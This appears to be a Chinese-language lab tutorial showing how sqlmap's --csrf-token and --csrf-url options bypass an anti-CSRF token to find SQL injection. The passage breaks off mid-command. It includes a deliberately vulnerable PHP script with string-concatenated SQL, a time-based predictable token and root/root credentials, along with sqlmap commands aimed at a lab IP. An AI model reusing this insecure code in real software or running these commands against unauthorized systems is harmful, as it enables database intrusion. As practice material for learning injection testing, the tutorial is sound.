sqlmap繞過CSRF檢測進行注入 CanMeng

最近在準備比賽，打sqlilabs時看了一下sqlmap的wiki，發現了–csrf-token和–csrf-url的參數，因而寫了個php版本的bug試了一試。
同時也瞭解了一下你們對csrf注入的廣泛作法：sqlmap+burp正則匹配，兩相比較，仍是sqlmap自帶的功能比較方便。

---

寫一個bug

CSRF的廣泛防護方法是增長anti-csrf token，也就是一串不可預測的字符串。因而動手寫了一個php版本防csrf的sqli腳本，這裏寫的並不規範，時間戳是能夠被預測的，並且此腳本能夠被繞過token檢測，有興趣能夠琢磨一下。

<?php
    session_start();
    //生成隨機token
    $token = md5(time());
    //獲取name參數
    $name = isset($_GET['name']) ? $_GET['name']: '';

    //校驗token
    if ($_GET['token'] == $_SESSION['token']) {
        //執行sql語句
        $mysqli = new mysqli("127.0.0.1","root","root");
        $mysqli->select_db("test");
        if (!$mysqli->connect_error) {
            $query = "select * from admin where username = '$name'";
            $result = $mysqli->query($query);
            if (!$mysqli->error) {
                while ($row = $result->fetch_row()) {
                    echo $row;
                }
            } else {
                echo $mysqli->error;
            }
        } else {
            echo $mysqli->connect_error;
        }
        $mysqli->close();
    } else {
        echo "no token";
    }

    //以hidden表單元素的形式輸出token
    echo "<input type="hidden" name="token" value="$token">";
    //刷新SESSION中token
    $_SESSION['token'] = $token;

?>

漏洞利用

sqlmap 中有這樣兩個參數

• –csrf-token=」token_name」，指定隨機化token的參數名
• –csrf-url=」http://x.x.x.x/page」，指定獲取token值的地址

若是沒有指定–csrf-url，則默認從當前頁面獲取token。先來看看不指定token時，sqlmap的輸出：

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session

sqlmap根據關鍵字，識別出了token參數，可是默認不獲取token，沒有發現注入點。

再來看看指定token時的輸出：

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --csrf-token="token"

確認了注入的存在，而且在wireshark中觀察到token被sqlmap自動更新

在這個demo中，獲取token的頁面和注入點相同，在真實場景中，可能須要單獨獲取token值，這時要用到–csrf-url=<url>的參數。

因此使用如下命令，效果也是同樣的：

sqlmap -u "http://192.168.154.134/tokensql.php?name=admin&token=123" --flush-session --cs